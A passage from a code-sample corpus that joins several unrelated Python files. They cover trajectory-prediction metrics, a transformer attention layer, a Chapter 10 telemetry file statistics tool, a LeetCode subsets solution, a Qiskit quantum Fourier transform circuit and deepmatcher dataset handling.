for scene in spatial_conflicts_results:
global_.append(spatial_conflicts_results[scene]["distance"])
spatial_conflicts_results["global"] = {}
spatial_conflicts_results["global"]["distance"] = np.mean(global_)
return spatial_conflicts_results
def spatial_hist(scene_files,scenes_dimensions, types_to_spatial, cell_size, use_inputs = 1):
spatial_conflicts_results = {}
for scene_file in scene_files:
scene = scene_file.split("/")[-1].split(".")[0].split("_")[0]
spatial_conflicts_results[scene] = 0
scene_file = json.load(open(scene_file))
h,w = scenes_dimensions[scene]
grid_label = get_grid(w,h,cell_size)
grid_output = get_grid(w,h,cell_size)
spatial_conflicts_results[scene] = {}
for sample in scene_file:
sample = scene_file[sample]
label = sample["labels"][0]
output = sample["outputs"][0]
inputs = sample["inputs"][0]
type_ = sample["types"][0]
for p_label, p_output in zip(label, output):
grid_label = fill_grid(p_label, grid_label, cell_size)
grid_output = fill_grid(p_output, grid_output, cell_size)
if use_inputs:
for p_input in inputs:
grid_label = fill_grid(p_input, grid_label, cell_size)
grid_label = grid_label.flatten()
grid_output = grid_output.flatten()
grid_label /= grid_label.sum()
grid_output /= grid_output.sum()
spatial_conflicts_results[scene]["manhattan"] = scipy.spatial.distance.minkowski(grid_label,grid_output,p=1)
# print("a {}".format(wasserstein_distance(cell_distrib_label,cell_distrib_output)))
global_ = []
for scene in spatial_conflicts_results:
val = spatial_conflicts_results[scene]["manhattan"]
global_.append(val)
spatial_conflicts_results["global"] = {}
spatial_conflicts_results["global"]["manhattan"] = np.mean(global_)
return spatial_conflicts_results
def fill_grid(p,grid,cell_size):
i = int(p[0]/cell_size)
j = int(p[1]/cell_size)
# print(p,i,j)
if i < grid.shape[0] and j < grid.shape[1]:
grid[i,j] += 1
return grid
# def get_grid(h,w,cell_size, meter_margin = 7):
# cell_margin = int(meter_margin/cell_size)
# print(cell_size, cell_margin)
# if int(meter_margin/cell_size) != meter_margin/cell_size:
# cell_margin += 1
# print(cell_margin)
# nh = int(h/cell_size) + 1 + cell_margin
# nw = int(w/cell_size) + 1 + cell_margin
# grid = np.zeros((nh,nw))
# return grid
def get_grid(h,w,cell_size):
nh = int(h/cell_size) + 1
nw = int(w/cell_size) + 1
grid = np.zeros((nh,nw))
return grid
def get_scene_dimension(pixel_height,pixel_width,pixel_meter_ratio):
meter_height = pixel_height * pixel_meter_ratio
meter_width = pixel_width * pixel_meter_ratio
return meter_height,meter_width
def cut_decimals(a,n = 2):
return int(a * 10 ** n)/ 10 ** n
def get_scene_dimensions(scenes,images,pixel_meter_ratios):
dimensions = {}
for scene in scenes:
pixel_meter_ratio = pixel_meter_ratios[scene]
img_path = images.format(scene)
img = np.array(cv2.imread(img_path))
h,w,_ = img.shape
h,w = get_scene_dimension(h,w,pixel_meter_ratio)
h = cut_decimals(h)
w = cut_decimals(w)
dimensions[scene] = (h,w)
return dimensions
def spatial(scene_files,types_to_spatial,images,spatial_annotations,spatial_profiles,pixel_meter_ratios):
nb_sample = 0
spatial_conflicts_results = { "global": {"groundtruth":0,"pred":0}}
for scene_file in scene_files:
scene = scene_file.split("/")[-1].split(".")[0].split("_")[0]
spatial_conflicts_results[scene] = {"groundtruth":0,"pred":0}
scene_file = json.load(open(scene_file))
#compute mask for spatial structure
spatial_masks = scene_mask(scene,images,spatial_annotations,spatial_profiles)
#get rtio for meter to pixel conversion
meters_to_pixel = 1.0/pixel_meter_ratios[scene]
# 1.0/ self.pixel_meter_ratios[self.scene]
# print(scene)
nb_sample_scene = 0
for sample in scene_file:
sample = scene_file[sample]
label = np.array(sample["labels"][0]) * meters_to_pixel
output = np.array(sample["outputs"][0]) * meters_to_pixel
type_ = sample["types"][0]
spatial_profile_id = types_to_spatial[str(int(type_))]
mask = spatial_masks[spatial_profile_id]
nb_pt = len(output)
spatial_pred = spatial_conflicts(mask,output)
spatial_gt = spatial_conflicts(mask,label)
spatial_conflicts_results["global"]["groundtruth"] += spatial_gt
spatial_conflicts_results["global"]["pred"] += spatial_pred
spatial_conflicts_results[scene]["groundtruth"] += spatial_gt
spatial_conflicts_results[scene]["pred"] += spatial_pred
nb_sample_scene += 1
spatial_conflicts_results[scene]["groundtruth"] /= float(nb_pt*nb_sample_scene)
spatial_conflicts_results[scene]["pred"] /= float(nb_pt*nb_sample_scene)
nb_sample += nb_sample_scene
spatial_conflicts_results["global"]["groundtruth"] /= float(nb_pt*nb_sample)
spatial_conflicts_results["global"]["pred"] /= float(nb_pt*nb_sample)
return spatial_conflicts_results
def spatial_conflicts(mask,trajectory_p):
ctr = 0
# print(mask.shape)
for point in trajectory_p:
#case out of frame
if int(point[0]) in range(0,mask.shape[0]) and int(point[1]) in range(0,mask.shape[1]):
if mask[int(point[0]),int(point[1])]:
ctr += 1
return ctr
def social_conflicts(scene_files, conflict_thresholds):
social_results = {}
social_results["global"] = {}
for thresh in conflict_thresholds:
social_results["global"]["joint_"+str(thresh)] = []
social_results["global"]["disjoint_"+str(thresh)] = []
social_results["global"]["groundtruth_"+str(thresh)] = []
for scene_file in scene_files:
scene = scene_file.split("/")[-1].split(".")[0].split("_")[0]
social_results[scene] = {}
for thresh in conflict_thresholds:
social_results[scene]["joint_"+str(thresh)] = []
social_results[scene]["disjoint_"+str(thresh)] = []
social_results[scene]["groundtruth_"+str(thresh)] = []
# print(scene)
scene_file = json.load(open(scene_file))
for sample in scene_file:
sample = scene_file[sample]
labels = sample["labels"]
outputs = sample["outputs"]
# social loss
social_sample = copy.copy(labels)
social_sample[0] = outputs[0]
social_sample = np.array(social_sample)
labels = np.array(labels)
outputs = np.array(outputs)
# social loss
for thresh in conflict_thresholds:
# print(thresh)
frames_joint = conflicts(outputs,thresh)
frames_disjoint = conflicts(social_sample,thresh)
frames_gt = conflicts(labels,thresh)
social_results["global"]["joint_"+str(thresh)] += frames_joint
social_results["global"]["disjoint_"+str(thresh)] += frames_disjoint
social_results["global"]["groundtruth_"+str(thresh)] += frames_gt
social_results[scene]["joint_"+str(thresh)] += frames_joint
social_results[scene]["disjoint_"+str(thresh)] += frames_disjoint
social_results[scene]["groundtruth_"+str(thresh)] += frames_gt
for thresh in conflict_thresholds:
social_results[scene]["joint_"+str(thresh)] = np.mean(social_results[scene]["joint_"+str(thresh)])
social_results[scene]["disjoint_"+str(thresh)] = np.mean(social_results[scene]["disjoint_"+str(thresh)])
social_results[scene]["groundtruth_"+str(thresh)] = np.mean(social_results[scene]["groundtruth_"+str(thresh)])
for thresh in conflict_thresholds:
social_results["global"]["joint_"+str(thresh)] = np.mean(social_results["global"]["joint_"+str(thresh)])
social_results["global"]["disjoint_"+str(thresh)] = np.mean(social_results["global"]["disjoint_"+str(thresh)])
social_results["global"]["groundtruth_"+str(thresh)] = np.mean(social_results["global"]["groundtruth_"+str(thresh)])
return social_results
# print(wasserstein_distance(distrib_pred,distrib_real))
def conflicts(trajectories,threshold = 0.5):
timesteps = []
for t in range(trajectories.shape[1]):
points = np.array(trajectories[:,t])
conflict_prop = conflicts_frame(points,threshold)
timesteps.append(conflict_prop)
return timesteps
def conflicts_frame(points,threshold):
d = distance_matrix(points,points)
m = (d < threshold).astype(int) - np.eye(len(points))
total_count = np.ones_like(m)
m = np.triu(m,1)
total_count = np.triu(total_count,1)
if float(total_count.sum()) > 0.:
conflict_prop = m.sum() / float(total_count.sum())
else:
conflict_prop = 0
return conflict_prop
def get_distrib_conflicts(scene_files):
distrib_pred_disjoint = {"global":[]}
distrib_pred = {"global":[]}
distrib_real = {"global":[]}
results = {}
for scene_file in scene_files:
scene = scene_file.split("/")[-1].split(".")[0].split("_")[0]
# print(scene)
distrib_pred[scene] = []
distrib_pred_disjoint[scene] = []
distrib_real[scene] = []
scene_file = json.load(open(scene_file))
for sample in scene_file:
sample = scene_file[sample]
labels = sample["labels"]
outputs = sample["outputs"]
# inputs = sample["inputs"]
types = sample["types"]
point_mask = sample["points_mask"]
social_sample = copy.copy(labels)
social_sample[0] = outputs[0]
social_sample = np.array(social_sample)
labels = np.array(labels)
outputs = np.array(outputs)
distances_pred_disjoint = get_distances_agents_interval(social_sample)
distances_pred = get_distances_agents_interval(outputs)
distances_real = get_distances_agents_interval(labels)
distrib_pred_disjoint["global"] += distances_pred_disjoint
distrib_pred["global"] += distances_pred
distrib_real["global"] += distances_real
distrib_pred_disjoint[scene] += distances_pred_disjoint
distrib_pred[scene] += distances_pred
distrib_real[scene] += distances_real
results[scene] = {}
results[scene]["disjoint"] = wasserstein_distance(distrib_pred_disjoint[scene],distrib_real[scene])
results[scene]["joint"] = wasserstein_distance(distrib_pred[scene],distrib_real[scene])
results["global"] = {}
results["global"]["disjoint"] = wasserstein_distance(distrib_pred_disjoint["global"],distrib_real["global"])
results["global"]["joint"] = wasserstein_distance(distrib_pred["global"],distrib_real["global"])
return results
def get_distances_agents_frame(points):
d = distance_matrix(points,points)
d = np.triu(d,1).flatten()
distances = [e for e in d if e != 0.]
return distances
def get_distances_agents_interval(trajectories):
distances_interval = []
for t in range(trajectories.shape[1]):
points = np.array(trajectories[:,t])
distances = get_distances_agents_frame(points)
distances_interval += distances
return distances_interval
def speeds_distance(scene_files,types_dic,delta_t):
speed_real_distribution = {}
speed_predicted_distribution = {}
speed_real_distribution["global"] = []
speed_predicted_distribution["global"] = []
for scene_file in scene_files:
scene_file = json.load(open(scene_file))
for sample in scene_file:
sample = scene_file[sample]
labels = sample["labels"]
outputs = sample["outputs"]
# inputs = sample["inputs"]
types = sample["types"]
point_mask = sample["points_mask"]
type_str = types_dic[str(int(types[0]))]
if type_str not in speed_predicted_distribution:
speed_predicted_distribution[type_str] = []
if type_str not in speed_real_distribution:
speed_real_distribution[type_str] = []
speeds_labels = get_speeds(labels[0],delta_t)
speeds_outputs = get_speeds(outputs[0],delta_t)
speed_real_distribution[type_str] += speeds_labels
speed_predicted_distribution[type_str] += speeds_outputs
speed_predicted_distribution["global"] += speeds_outputs
speed_real_distribution["global"] += speeds_labels
results = {}
for type_ in speed_real_distribution:
results[type_] = wasserstein_distance(speed_predicted_distribution[type_],speed_real_distribution[type_])
return results
def accelerations_distance(scene_files,types_dic,delta_t):
acceleration_real_distribution = {}
acceleration_predicted_distribution = {}
acceleration_real_distribution["global"] = []
acceleration_predicted_distribution["global"] = []
for scene_file in scene_files:
scene_file = json.load(open(scene_file))
for sample in scene_file:
sample = scene_file[sample]
labels = sample["labels"]
outputs = sample["outputs"]
# inputs = sample["inputs"]
types = sample["types"]
point_mask = sample["points_mask"]
type_str = types_dic[str(int(types[0]))]
if type_str not in acceleration_predicted_distribution:
acceleration_predicted_distribution[type_str] = []
if type_str not in acceleration_real_distribution:
acceleration_real_distribution[type_str] = []
speeds_labels = get_speeds(labels[0],delta_t)
speeds_outputs = get_speeds(outputs[0],delta_t)
accelerations_labels = get_accelerations(speeds_labels,delta_t)
accelerations_outputs = get_accelerations(speeds_outputs,delta_t)
acceleration_real_distribution[type_str] += accelerations_labels
acceleration_predicted_distribution[type_str] += accelerations_outputs
acceleration_predicted_distribution["global"] += accelerations_outputs
acceleration_real_distribution["global"] += accelerations_labels
results = {}
for type_ in acceleration_real_distribution:
results[type_] = wasserstein_distance(acceleration_predicted_distribution[type_],acceleration_real_distribution[type_])
return results | StarcoderdataPython |
3391832 | <filename>ninjadog/utils.py
from functools import partial
from json import dumps
jsonify = partial(dumps, skipkeys=True, default=lambda _: '', ensure_ascii=False)
| StarcoderdataPython |
670 | <reponame>StateOfTheArt-quant/transformerquant
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import torch.nn as nn
from .single import attention
class MultiHeadedAttention(nn.Module):
def __init__(self, d_model, nhead, dropout=0.1):
super().__init__()
assert d_model % nhead ==0
# we assume d_v always equal d_k
self.d_k = d_model // nhead
self.nhead = nhead
self.linear_layers = nn.ModuleList([nn.Linear(d_model, d_model) for _ in range(3)])
self.output_linear = nn.Linear(d_model, d_model)
self.dropout = nn.Dropout(p=dropout)
def forward(self, query, key, value, mask=None):
if mask is not None:
mask = mask.unsqueeze(1)
batch_size = query.size(0)
# 1) Do all the linear projections in batch from d_model => h x d_k
query, key, value = [l(x).view(batch_size, -1, self.nhead, self.d_k).transpose(1, 2)
for l, x in zip(self.linear_layers, (query, key, value))]
# 2) Apply attention on all the projected vectors in batch.
x, attn = attention(query, key, value, mask=mask, dropout=self.dropout)
# 3) "Concat" using a view and apply a final linear.
x = x.transpose(1, 2).contiguous().view(batch_size, -1, self.nhead * self.d_k)
context = self.output_linear(x)
return context#, attn | StarcoderdataPython |
1743268 | <reponame>atac-bham/c10-tools
from contextlib import suppress
from urllib.parse import urlparse
import os
from termcolor import colored
import click
import s3fs
from c10_tools.common import C10, FileProgress, fmt_number, fmt_size, \
fmt_table, walk_packets
TYPES = (
'Computer Generated',
'PCM',
'Time',
'Mil-STD-1553',
'Analog',
'Discrete',
'Message',
'ARINC 429',
'Video',
'Image',
'UART',
'IEEE-1394',
'Parallel',
'Ethernet',
'TSPI/CTS Data',
'Controller Area Network Bus',
)
class Stat:
def __init__(self, filename, channel, exclude, type, verbose, quiet):
self.filename = filename
self.channel = channel
self.exclude = exclude
self.type = type
self.verbose = verbose
self.quiet = quiet
self.channels, self.start_time = {}, 0
def parse(self):
try:
self.scan_file()
except:
return
self.file_summary()
def scan_file(self):
"""Skim the headers of a file and count packets and data size per channel.
"""
# Get file object and size
# S3 Format: s3://user:pass@host:port/bucket/path.c10
if self.filename.startswith('s3://'):
path = urlparse(self.filename)
endpoint = f'http://{path.hostname}:{path.port}'
fs = s3fs.S3FileSystem(key=path.username,
secret=path.password,
client_kwargs={
'endpoint_url': endpoint})
f = fs.open(path.path[1:])
size = fs.du(path.path[1:])
else:
f = open(self.filename, 'rb')
size = os.stat(self.filename).st_size
# Walk through packets and track counts.
with FileProgress(total=size, disable=self.quiet) as progress, suppress(KeyboardInterrupt):
try:
args = {
'--channel': self.channel,
'--type': self.type,
'--exclude': self.exclude
}
for packet in walk_packets(C10(f), args):
if not self.start_time and packet.data_type == 0x11:
self.start_time = packet
key = (packet.channel_id, packet.data_type)
if key not in self.channels:
self.channels[key] = {'packets': 1,
'size': packet.packet_length,
'type': packet.data_type,
'id': packet.channel_id,
'1553_errors': [0, 0, 0],
'1553_commands': set(),
'events': {}}
else:
self.channels[key]['packets'] += 1
self.channels[key]['size'] += packet.packet_length
if self.verbose:
# Track 1553 error counts and command words
if packet.data_type == 0x19:
for msg in packet:
self.channels[key]['1553_commands'].add(
f'{msg.data[0]:0x}'.zfill(2) + f'{msg.data[1]:0x}'.zfill(2))
for i, err in enumerate(('le', 'se', 'we')):
err = getattr(msg, err)
self.channels[key]['1553_errors'][i] += err
# Record events
elif packet.data_type == 0x2:
event_list = self.channels[key]['events']
for event in packet:
if event.number not in event_list:
event_list[event.number] = 1
else:
event_list[event.number] += 1
progress.update(packet.packet_length)
except Exception as err:
print(f'Failed to read file {self.filename} at offset \
{progress.n} with {err.__class__.__name__}: {err}')
raise
finally:
f.close()
try:
self.end_time = packet.get_time()
except UnboundLocalError:
self.end_time = None
def file_summary(self):
"""Summarize channels and the file as a whole."""
# Print channel details.
table = [('Channel ID', 'Data Type', 'Packets', 'Size')]
packets, size = 0, 0
for key, channel in sorted(self.channels.items()):
datatype = channel['type'] // 8
subtype = channel['type'] - (datatype * 8)
table.append((
f'Channel {channel["id"]:2}',
f'0x{channel["type"]:02x} - {TYPES[datatype]} (format \
{subtype})',
fmt_number(channel['packets']),
fmt_size(channel['size'])))
if self.verbose:
if channel['type'] == 0x19:
table.append((f' Command words ({len(channel["1553_commands"])}):',))
for command in sorted(channel['1553_commands']):
table.append((f' {command}',))
total = sum(channel['1553_errors'])
if total:
error_str = ' Err: ' + f'{total:>11,}'
for i, err in enumerate(('Length', 'Sync', 'Word')):
count = channel['1553_errors'][i]
error_str += f' {err}: {count:>9,}'.ljust(14)
table.append((colored(error_str + ' ', 'red'),))
elif channel['type'] == 0x2:
table.append((' Events:',))
for event, count in sorted(channel['events'].items()):
table.append((f'{event:>8}: {count:>10}',))
packets += channel['packets']
size += channel['size']
print(fmt_table(table))
# Print file summary.
duration = 0
start_time, end_time = 0, 0
if self.start_time:
duration = str(self.end_time - self.start_time.time)
fmt = '%j %H:%M:%S'
if self.start_time.date_format:
fmt = '%j-%Y %H:%M:%S'
start_time = self.start_time.time.strftime(fmt)
end_time = self.end_time.strftime(fmt)
print(f'''Summary for {self.filename}:
Channels: {len(self.channels):>17} Start time:{start_time:>25}
Packets: {fmt_number(packets):>18} End time:{end_time:>27}
Size: {fmt_size(size):>21} Duration:{duration:>27}\n''')
@click.command()
@click.argument('file', nargs=-1)
@click.option('-c', '--channel', type=str, help='Specify channels (comma-separated) to include')
@click.option('-e', '--exclude', type=str, help='Specify channels (comma-separated) to exclude')
@click.option('-t', '--type', type=str, help='Specify datatypes (comma-separated) to include')
@click.pass_context
def stat(ctx, file, channel, exclude, type):
"""Inspect one or more Chapter 10 files and get channel info."""
ctx.ensure_object(dict)
for filename in file:
stats = Stat(filename, channel, exclude, type,
verbose=ctx.obj.get('verbose'), quiet=ctx.obj.get('quiet'))
stats.parse()
| StarcoderdataPython |
1770285 | <gh_stars>0
#
# @lc app=leetcode id=90 lang=python3
#
# [90] Subsets II
#
# @lc code=start
class Solution:
def gen_recur(self, leading_sets: List[List[int]], ns: List[List[int]]) \
-> List[List[int]]:
if not ns:
return leading_sets
all_sets = leading_sets[:]
n, c = ns[0]
for i in range(1, c + 1):
all_sets += [s + [n] * i for s in leading_sets]
return self.gen(all_sets, ns[1:])
def gen_iter(self, ns: List[List[int]]) -> List[List[int]]:
leading_sets = [[]]
if not ns:
return leading_sets
for i in range(len(ns)):
new_sets = leading_sets[:]
n, c = ns[i]
for rep in range(1, c + 1):
new_sets += [s + [n] * rep for s in leading_sets]
leading_sets = new_sets
return leading_sets
def subsetsWithDup(self, nums: List[int]) -> List[List[int]]:
nums.sort()
ns = []
for n in nums:
if not ns or n != ns[-1][0]:
ns.append([n, 1])
else: # n == ns[-1][0]
ns[-1][1] += 1
return self.gen_iter(ns)
# @lc code=end
| StarcoderdataPython |
35681 | <gh_stars>0
"""Allow users to access the function directly."""
from egcd.egcd import egcd
| StarcoderdataPython |
1776493 | import numpy as np
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute
backend1 = BasicAer.get_backend('dm_simulator')
backend2 = BasicAer.get_backend('qasm_simulator')
options = {}
def generator(k):
return (np.pi*2)/(2**k)
num_of_qubits = 5
q = QuantumRegister(num_of_qubits, 'q')
circ = QuantumCircuit(q)
circ.h(q[0])
circ.cu1(generator(2),q[1],q[0])
circ.h(q[1])
circ.cu1(generator(3), q[2], q[0])
circ.cu1(generator(2), q[2], q[1])
circ.h(q[2])
circ.cu1(generator(4), q[3], q[0])
circ.cu1(generator(3), q[3], q[1])
circ.cu1(generator(2), q[3], q[2])
circ.h(q[3])
circ.cu1(generator(5), q[4], q[0])
circ.cu1(generator(4), q[4], q[1])
circ.cu1(generator(3), q[4], q[2])
circ.cu1(generator(2), q[4], q[3])
circ.h(q[4])
for wire in range (num_of_qubits-1):
circ.h(q[wire])
for rotation in range(wire+1):
circ.cu1(generator(wire+2-rotation), q[wire+1], q[rotation])
circ.h(q[num_of_qubits-1])
#circ.draw(output='mpl', line_length=120, scale=0.5)
circuits = [circ]
job = execute(circuits, backend1, **options)
result = job.result()
print(result)
job = execute(circuits, backend2, **options)
result = job.result()
print(result) | StarcoderdataPython |
1674946 | import copy
import logging
import os
from collections import Counter, defaultdict
from timeit import default_timer as timer
from typing import Any, Dict, List, Tuple
import pandas as pd
import pyprind
import six
import torch
import torch.nn as nn
from sklearn.decomposition import TruncatedSVD
from torchtext import data
from torchtext.data.example import Example
from torchtext.utils import unicode_csv_reader
from deepmatcher.data.field import MatchingField
from deepmatcher.data.iterator import MatchingIterator
from deepmatcher.models.modules import NoMeta, Pool
logger = logging.getLogger(__name__)
def split(
table: pd.DataFrame,
path: str,
train_prefix: str,
validation_prefix: str,
test_prefix: str,
split_ratio: Tuple[float, float, float] = (0.6, 0.2, 0.2),
stratified: bool = False,
strata_field: str = "label",
):
"""Split a pandas dataframe or CSV file into train / validation / test data sets.
Args:
table (pandas.Dataframe or string): The pandas dataframe or CSV file to split.
path (string): The directory to save the train, validation and test CSV files to.
train_prefix: Suffix to add to `path` to get the training set save path.
validation_prefix: Suffix to add to `path` to get the validation set save path.
test_prefix: Suffix to add to `path` to get the test set save path.
split_ratio (List of floats): a list of 3 numbers denoting the relative sizes of
train, test and valid splits respectively. Default is [0.6, 0.2, 0.2].
stratified (bool): whether the sampling should be stratified.
Default is False.
strata_field (str): name of the examples Field stratified over.
Default is 'label' for the conventional label field
"""
assert len(split_ratio) == 3
split_ratio = list(split_ratio)
if not isinstance(table, pd.DataFrame):
table = pd.read_csv(table)
if table.index.name is not None:
table = table.reset_index()
examples = list(table.itertuples(index=False))
fields = [(col, None) for col in list(table)]
dataset = data.Dataset(examples, fields)
train, valid, test = dataset.split(split_ratio, stratified, strata_field)
tables = (
pd.DataFrame(train.examples),
pd.DataFrame(valid.examples),
pd.DataFrame(test.examples),
)
prefixes = (train_prefix, validation_prefix, test_prefix)
for i in range(len(tables)):
tables[i].columns = table.columns
tables[i].to_csv(os.path.join(path, prefixes[i]), index=False)
class MatchingDataset(data.Dataset):
"""Represents dataset with associated metadata.
Holds all information about one split of a dataset (e.g. training set).
Attributes:
fields (dict): A mapping from attribute names (e.g. "left_address") to
corresponding :class:`~data.MatchingField` objects that specify how to process
the field.
examples (list): A list containing all the examples (labeled tuple pairs) in this
dataset.
metadata (dict): Metadata about the dataset (e.g. word probabilities).
See :meth:`~data.MatchingDataset.compute_metadata` for details.
corresponding_field (dict): A mapping from left table attribute names
(e.g. "left_address") to corresponding right table attribute names
(e.g. "right_address") and vice versa.
text_fields (dict): A mapping from canonical attribute names (e.g. "address") to
tuples of the corresponding left and right attribute names
(e.g. ("left_address", "right_address")).
all_left_fields (list): A list of all left table attribute names.
all_right_fields (list): A list of all right table attribute names.
canonical_text_fields (list): A list of all canonical attribute names.
label_field (str): Name of the column containing labels.
id_field (str): Name of the column containing tuple pair ids.
"""
class CacheStaleException(Exception):
"""Raised when the dataset cache is stale and no fallback behavior is specified."""
pass
def __init__(
self,
fields: List[Tuple[str, MatchingField]],
column_naming: Dict[str, str],
path: str,
out_format: str = "csv",
examples: List[Example] = None,
metadata: Dict[str, Dict[str, Any]] = None,
**kwargs
):
"""Creates a MatchingDataset.
Creates a MatchingDataset by performing the following, if `examples` parameter is
not specified:
#. Read each example (tuple pair) in specified CSV file.
#. Preprocess example. Involves lowercasing and tokenization (unless disabled).
#. Compute metadata. See :meth:`~data.MatchingDataset.compute_metadata` for
details.
If `examples` is specified, initializes MatchingDataset from given `examples`
and `metadata` arguments.
Arguments:
fields (list(tuple(str, MatchingField))): A list of tuples containing column
name (e.g. "left_address") and corresponding :class:`~data.MatchingField`
pairs, in the same order that the columns occur in the CSV file. Tuples of
(name, None) represent columns that will be ignored.
column_naming (dict): A `dict` containing the following keys:
* ``id``: The name of the tuple pair ID column.
* ``label``: The name of the tuple pair match label column.
* ``left``: The prefix for attribute names belonging to the left table.
* ``right``: The prefix for attribute names belonging to the right table.
path (str): Path to the data file. Must be specified if `examples` is None.
out_format (str): The format of the data file. One of "CSV" or "TSV".
examples (list): A list containing all the examples (labeled tuple pairs) in
this dataset. Must be specified if `path` is None.
metadata (dict): Metadata about the dataset (e.g. word probabilities).
See :meth:`~data.MatchingDataset.compute_metadata` for details.
filter_pred (callable or None): Use only examples for which
filter_pred(example) is True, or use all examples if None.
Default is None. This is a keyword-only parameter.
"""
if examples is None:
make_example = {
"json": Example.fromJSON,
"dict": Example.fromdict,
"tsv": Example.fromCSV,
"csv": Example.fromCSV,
}[out_format.lower()]
lines = 0
with open(os.path.expanduser(path), encoding="utf8") as f:
for line in f:
lines += 1
with open(os.path.expanduser(path), encoding="utf8") as f:
if out_format == "csv":
reader = unicode_csv_reader(f)
elif out_format == "tsv":
reader = unicode_csv_reader(f, delimiter="\t")
else:
reader = f
next(reader)
examples = [
make_example(line, fields)
for line in pyprind.prog_bar(
reader,
iterations=lines,
title='\nReading and processing data from "' + path + '"',
)
]
super(MatchingDataset, self).__init__(examples, fields, **kwargs)
else:
self.fields = dict(fields)
self.examples = examples
self.metadata = metadata
self.path = path
self.column_naming = column_naming
self._set_attributes()
def _set_attributes(self):
"""Sets attributes by inferring mapping between left and right table attributes."""
self.corresponding_field = {}
self.text_fields = {}
self.all_left_fields = []
for name, field in six.iteritems(self.fields):
if name.startswith(self.column_naming["left"]) and field is not None:
self.all_left_fields.append(name)
self.all_right_fields = []
for name, field in six.iteritems(self.fields):
if name.startswith(self.column_naming["right"]) and field is not None:
self.all_right_fields.append(name)
self.canonical_text_fields = []
for left_name in self.all_left_fields:
canonical_name = left_name[len(self.column_naming["left"]) :]
right_name = self.column_naming["right"] + canonical_name
self.corresponding_field[left_name] = right_name
self.corresponding_field[right_name] = left_name
self.text_fields[canonical_name] = left_name, right_name
self.canonical_text_fields.append(canonical_name)
self.all_text_fields = self.all_left_fields + self.all_right_fields
self.label_field = self.column_naming["label"]
self.id_field = self.column_naming["id"]
def compute_metadata(self, pca: bool = False):
"""Computes metadata about the dataset.
Computes the following metadata about the dataset:
* ``word_probs``: For each attribute in the dataset, a mapping from words to
word (token) probabilities.
* ``totals``: For each attribute in the dataset, a count of the total number of
words present in all attribute examples.
* ``pc``: For each attribute in the dataset, the first principal component of the
sequence embeddings for all values of that attribute. The sequence embedding of
an attribute value is computed by taking the weighted average of its word
embeddings, where the weight is the soft inverse word probability. Refer
`Arora et al. (2017) <https://openreview.net/pdf?id=SyK00v5xx>`__ for details.
Arguments:
pca (bool): Whether to compute the ``pc`` metadata.
"""
self.metadata = {}
# Create an iterator over the entire dataset.
train_iter = MatchingIterator(
self, self, train=False, batch_size=1024, device=-1, sort_in_buckets=False
)
counter: Dict[str, Counter] = defaultdict(Counter)
# For each attribute, find the number of times each word id occurs in the dataset.
# Note that word ids here also include ``UNK`` tokens, padding tokens, etc.
for batch in pyprind.prog_bar(train_iter, title="\nBuilding vocabulary"):
for name in self.all_text_fields:
attr_input = getattr(batch, name)
counter[name].update(attr_input.data.data.view(-1))
word_probs = {}
totals = {}
for name in self.all_text_fields:
attr_counter = counter[name]
total = sum(attr_counter.values())
totals[name] = total
field_word_probs = {}
for word, freq in attr_counter.items():
field_word_probs[int(word)] = freq / total
word_probs[name] = field_word_probs
self.metadata["word_probs"] = word_probs
self.metadata["totals"] = totals
if not pca:
return
# To compute principal components, we need to compute weighted sequence embeddings
# for each attribute. To do so, for each attribute, we first construct a neural
# network to compute word embeddings and take their weighted average.
field_embed: Dict[MatchingField, NoMeta] = {}
embed: Dict[str, NoMeta] = {}
inv_freq_pool = Pool("inv-freq-avg")
for name in self.all_text_fields:
field = self.fields[name]
if field not in field_embed:
vectors_size = field.vocab.vectors.shape
embed_layer = nn.Embedding(vectors_size[0], vectors_size[1])
embed_layer.weight.data.copy_(field.vocab.vectors) # type: ignore
embed_layer.weight.requires_grad = False
field_embed[field] = NoMeta(embed_layer)
embed[name] = field_embed[field]
# Create an iterator over the entire dataset.
train_iter = MatchingIterator(
self, self, train=False, batch_size=1024, device=-1, sort_in_buckets=False
)
attr_embeddings: Dict[str, List[torch.Tensor]] = defaultdict(list)
# Run the constructed neural network to compute weighted sequence embeddings
# for each attribute of each example in the dataset.
for batch in pyprind.prog_bar(
train_iter, title="\nComputing principal components"
):
for name in self.all_text_fields:
attr_input = getattr(batch, name)
embeddings = inv_freq_pool(embed[name](attr_input))
attr_embeddings[name].append(embeddings.data.data)
# Compute the first principal component of weighted sequence embeddings for each
# attribute.
pc = {}
for name in self.all_text_fields:
concatenated = torch.cat(attr_embeddings[name])
svd = TruncatedSVD(n_components=1, n_iter=7)
svd.fit(concatenated.numpy())
pc[name] = svd.components_[0]
self.metadata["pc"] = pc
def finalize_metadata(self):
r"""Perform final touches to dataset metadata.
This allows performing modifications to metadata that cannot be serialized into
the cache.
"""
self.orig_metadata = copy.deepcopy(self.metadata)
for name in self.all_text_fields:
self.metadata["word_probs"][name] = defaultdict(
lambda: 1 / self.metadata["totals"][name],
self.metadata["word_probs"][name],
)
def get_raw_table(self):
r"""Create a raw pandas table containing all examples (tuple pairs) in the dataset.
To resurrect tokenized attributes, this method currently naively joins the tokens
using the whitespace delimiter.
"""
rows = []
columns = [name for name, field in six.iteritems(self.fields) if field]
for ex in self.examples:
row = []
for attr in columns:
if self.fields[attr]:
val = getattr(ex, attr)
if self.fields[attr].sequential:
val = " ".join(val)
row.append(val)
rows.append(row)
return pd.DataFrame(rows, columns=columns)
def sort_key(self, ex):
r"""Sort key for dataset examples.
A key to use for sorting dataset examples for batching together examples with
similar lengths to minimize padding.
"""
return interleave_keys(
[len(getattr(ex, attr)) for attr in self.all_text_fields]
)
@staticmethod
def save_cache(datasets, fields, datafiles, cachefile, column_naming, state_args):
r"""Save datasets and corresponding metadata to cache.
This method also saves as many data loading arguments as possible to help ensure
that the cache contents are still relevant for future data loading calls. Refer
to :meth:`~data.Dataset.load_cache` for more details.
Arguments:
datasets (list): List of datasets to cache.
fields (dict): Mapping from attribute names (e.g. "left_address") to
corresponding :class:`~data.MatchingField` objects that specify how to
process the field.
datafiles (list): A list of the data files.
cachefile (str): The cache file path.
column_naming (dict): A `dict` containing column naming conventions. See
`__init__` for details.
state_args (dict): A `dict` containing other information about the state under
which the cache was created.
"""
examples = [dataset.examples for dataset in datasets]
train_metadata = datasets[0].metadata
datafiles_modified = [os.path.getmtime(datafile) for datafile in datafiles]
vocabs = {}
field_args = {}
reverse_fields = {}
for name, field in six.iteritems(fields):
reverse_fields[field] = name
